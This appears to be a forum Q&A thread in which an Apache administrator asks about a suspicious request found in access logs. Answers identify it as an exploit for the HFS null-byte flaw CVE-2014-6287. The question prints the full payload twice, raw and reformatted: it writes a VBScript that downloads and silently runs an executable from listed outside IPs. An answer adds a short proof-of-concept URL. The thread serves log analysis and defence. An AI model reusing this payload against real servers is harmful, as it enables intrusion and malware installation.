# suspicious http request in logs

Tags: webserver, apache

I found this request in my Ubuntu 14.04 apache2 access.log:

```
xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 9975 "-" "-"
```

My questions are:

1. What does this script do?
2. Why was the result code 200?
3. Are there actions I should take?

Formatted a little, the request looks like:

```
xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] 
"GET /?search==%00
{
.exec|cmd.exe /c echo>22222.vbs dim wait,quit,out:
Set xml=CreateObject("Microsoft.XMLHTTP"):
Set WshShell = Wscript.CreateObject("WScript.Shell") :
DS=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443"):
for each Url in DS:
    wait=true:
    quit=false:
    D(Url):
    if quit then:
        exit for:
    end if:
    next:
    Sub D(Url):
    if IsObject(xml)=false then:
        Set xml=CreateObject("Microsoft.XMLHTTP"):
    end if :
    xml.Open "GET","http://"^&Url^&"/getsetup.exe",True:
    xml.OnReadyStateChange=GetRef("xmlstat"):
    out=Now:
    xml.Send():
    while(wait and 60^>abs(datediff("s",Now,out))):
    wscript.sleep(1000):
    wend:
    End Sub:
    sub xmlstat():

    If xml.ReadyState^<^>4 Then:
        exit sub:
    end if:

    wait=false:

    if xml.status^<^>200 then:
        exit sub:
    end if:

    quit=true:
    on error resume next:
    set sGet=CreateObject("ADODB.Stream"):
    sGet.Mode=3:
    sGet.Type=1:
    sGet.Open():
    sGet.Write xml.ResponseBody:
    sGet.SaveToFile "ko.exe",2:
    End sub:
    WshShell.run "ko.exe",0,0:
    Set fso =CreateObject("Scripting.Filesystemobject") :
    fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs.
} 
HTTP/1.1" 200 9975 "-" "-"
```

(Feel free to correct my formatting)

Answer (score 6, accepted):

The HTTP request is for `/` (the index page of your webserver) with a query string of "search=<chunk of VBscript>"

If you've got a vulnerable webserver (I don't know what makes a webserver vulnerable, but the "%00" in the URL makes me think it's related to inconsistent handling of null bytes), the script attempts to download and run "getsetup.exe", which is presumably a rootkit or other exploit.  In this case, the result of "200" means you just got owned.

If your webserver isn't vulnerable, this is just an ordinary request for the index page, with a query that's completely ignored.  In this case, the result of "200" means your webserver is functioning normally.

You're running Apache on Ubuntu.  Since this exploit only affects IIS on Windows, you can ignore it.

Comment: This topic is quite old, but for correctness, the exploit is not targeted on IIS. It is CVE-2014-6287 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287) and affects the Rejetto HTTP File Server software. See also here: https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--FHS-Null-Byte-Attack-(CVE-2014-6287)-Attempts-to-Install-DDoS-Malware-(Iptablex)/

Answer (score 3):

That's targeting an old vulnerability in HFS (HTTP File Server)

https://www.cvedetails.com/cve/CVE-2014-6287/

POC:

```
http://localhost:80/?search=%00{.exec|cmd.}
```

From: https://www.exploit-db.com/exploits/34668/

And what follows it is just a vbs script.

Comment: yes, this was covered in the answer-turned-comment above

Comment: Didn't pay attention to that comment.